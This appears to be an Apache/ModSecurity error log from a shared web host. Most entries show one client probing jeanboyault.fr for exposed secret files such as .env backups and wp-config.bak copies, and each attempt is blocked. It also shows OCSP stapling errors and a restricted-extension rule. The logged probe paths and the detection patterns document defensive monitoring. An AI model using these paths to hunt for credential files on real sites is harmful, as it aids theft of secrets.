[Mon May 11 11:38:39.966131 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:39366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjnkRdw2n9wv6Ai48DvQAAAJI"]
[Mon May 11 11:38:39.993459 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:39382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.debug.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.debug.old"] [unique_id "agGjn2S6k_SCYd1AVZqqYQAAARY"]
[Mon May 11 11:38:39.993674 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:39382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.debug.old"] [unique_id "agGjn2S6k_SCYd1AVZqqYQAAARY"]
[Mon May 11 11:38:41.830449 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:39382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjn2S6k_SCYd1AVZqqYQAAARY"]
[Mon May 11 11:38:49.123624 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:19210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env.old_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v3/.env.old_local"] [unique_id "agGjqb4KNmD_mZ_vlf80RwAAAEE"]
[Mon May 11 11:38:49.133220 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:19210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v3/.env.old_local"] [unique_id "agGjqb4KNmD_mZ_vlf80RwAAAEE"]
[Mon May 11 11:38:50.326700 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:19210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjqb4KNmD_mZ_vlf80RwAAAEE"]
[Mon May 11 11:38:50.353330 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:19212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env.old_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v3/.env.old_local"] [unique_id "agGjqkRdw2n9wv6Ai48DywAAAIE"]
[Mon May 11 11:38:50.353576 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:19212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v3/.env.old_local"] [unique_id "agGjqkRdw2n9wv6Ai48DywAAAIE"]
[Mon May 11 11:38:51.813338 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:19212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjqkRdw2n9wv6Ai48DywAAAIE"]
[Mon May 11 11:38:54.559477 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:28708] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /v3/wp-config.bak.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v3/wp-config.bak.local"] [unique_id "agGjrhjZymfuKpjWXeh4qAAAANY"]
[Mon May 11 11:38:54.560869 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:28708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v3/wp-config.bak.local"] [unique_id "agGjrhjZymfuKpjWXeh4qAAAANY"]
[Mon May 11 11:38:54.958326 2026] [ssl:error] [pid 1254179:tid 1254184] (EAI 2)Name or service not known: [client 188.166.121.214:48398] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:38:54.958372 2026] [ssl:error] [pid 1254179:tid 1254184] AH01941: stapling_renew_response: responder error
[Mon May 11 11:38:56.766448 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:28708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjrhjZymfuKpjWXeh4qAAAANY"]
[Mon May 11 11:38:56.793414 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:28710] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /v3/wp-config.bak.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v3/wp-config.bak.local"] [unique_id "agGjsEYQeUtAPynIs6xUJQAAABE"]
[Mon May 11 11:38:56.793616 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:28710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v3/wp-config.bak.local"] [unique_id "agGjsEYQeUtAPynIs6xUJQAAABE"]
[Mon May 11 11:38:58.022832 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:28710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjsEYQeUtAPynIs6xUJQAAABE"]
[Mon May 11 11:38:58.049496 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:28714] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/.env.bak.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/var/.env.bak.backup"] [unique_id "agGjsr4KNmD_mZ_vlf80TQAAAEk"]
[Mon May 11 11:38:58.049724 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:28714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/var/.env.bak.backup"] [unique_id "agGjsr4KNmD_mZ_vlf80TQAAAEk"]
[Mon May 11 11:38:59.224840 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:28714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjsr4KNmD_mZ_vlf80TQAAAEk"]
[Mon May 11 11:38:59.250894 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:28722] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/.env.bak.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/var/.env.bak.backup"] [unique_id "agGjsxjZymfuKpjWXeh4qgAAAME"]
[Mon May 11 11:38:59.251260 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:28722] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/var/.env.bak.backup"] [unique_id "agGjsxjZymfuKpjWXeh4qgAAAME"]
[Mon May 11 11:39:00.178706 2026] [ssl:error] [pid 1254179:tid 1254197] (EAI 2)Name or service not known: [client 213.173.62.32:44325] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:00.178747 2026] [ssl:error] [pid 1254179:tid 1254197] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:00.478617 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:28722] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjsxjZymfuKpjWXeh4qgAAAME"]
[Mon May 11 11:39:00.505082 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:28728] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/.env.dist_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/var/.env.dist_new"] [unique_id "agGjtEYQeUtAPynIs6xUJwAAAAs"]
[Mon May 11 11:39:00.505474 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:28728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/var/.env.dist_new"] [unique_id "agGjtEYQeUtAPynIs6xUJwAAAAs"]
[Mon May 11 11:39:01.350991 2026] [ssl:error] [pid 1256241:tid 1256252] (EAI 2)Name or service not known: [client 37.49.144.231:45679] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:01.351037 2026] [ssl:error] [pid 1256241:tid 1256252] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:01.680810 2026] [security2:error] [pid 1254212:tid 1254225] [client 185.177.72.9:28728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjtEYQeUtAPynIs6xUJwAAAAs"]
[Mon May 11 11:39:01.706911 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:28740] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/.env.dist_new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/var/.env.dist_new"] [unique_id "agGjtRjZymfuKpjWXeh4rAAAAMA"]
[Mon May 11 11:39:01.707244 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:28740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/var/.env.dist_new"] [unique_id "agGjtRjZymfuKpjWXeh4rAAAAMA"]
[Mon May 11 11:39:02.942854 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:28740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjtRjZymfuKpjWXeh4rAAAAMA"]
[Mon May 11 11:39:03.539711 2026] [security2:error] [pid 1254242:tid 1254453] [client 216.73.217.28:53402] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/jvzoo.com"] [unique_id "agGjt74KNmD_mZ_vlf80UQAAAEY"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fjvzoo.com
[Mon May 11 11:39:03.540126 2026] [security2:error] [pid 1254242:tid 1254453] [client 216.73.217.28:53402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/jvzoo.com"] [unique_id "agGjt74KNmD_mZ_vlf80UQAAAEY"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fjvzoo.com
[Mon May 11 11:39:03.541467 2026] [security2:error] [pid 1254242:tid 1254453] [client 216.73.217.28:53402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/jvzoo.com"] [unique_id "agGjt74KNmD_mZ_vlf80UQAAAEY"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fjvzoo.com
[Mon May 11 11:39:08.205667 2026] [ssl:error] [pid 1254179:tid 1254185] (EAI 2)Name or service not known: [client 178.128.164.211:43704] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:08.205703 2026] [ssl:error] [pid 1254179:tid 1254185] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:11.448260 2026] [ssl:error] [pid 1254133:tid 1254143] (EAI 2)Name or service not known: [client 103.119.111.33:43563] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:39:11.448300 2026] [ssl:error] [pid 1254133:tid 1254143] AH01941: stapling_renew_response: responder error
[Mon May 11 11:39:12.436093 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:52158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.staging.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/vendor/.env.staging.test"] [unique_id "agGjwL4KNmD_mZ_vlf80VgAAAEg"]
[Mon May 11 11:39:12.436327 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:52158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/vendor/.env.staging.test"] [unique_id "agGjwL4KNmD_mZ_vlf80VgAAAEg"]
[Mon May 11 11:39:14.036666 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:52158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjwL4KNmD_mZ_vlf80VgAAAEg"]
[Mon May 11 11:39:14.063922 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:12054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.staging.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/vendor/.env.staging.test"] [unique_id "agGjwkRdw2n9wv6Ai48D3AAAAI0"]
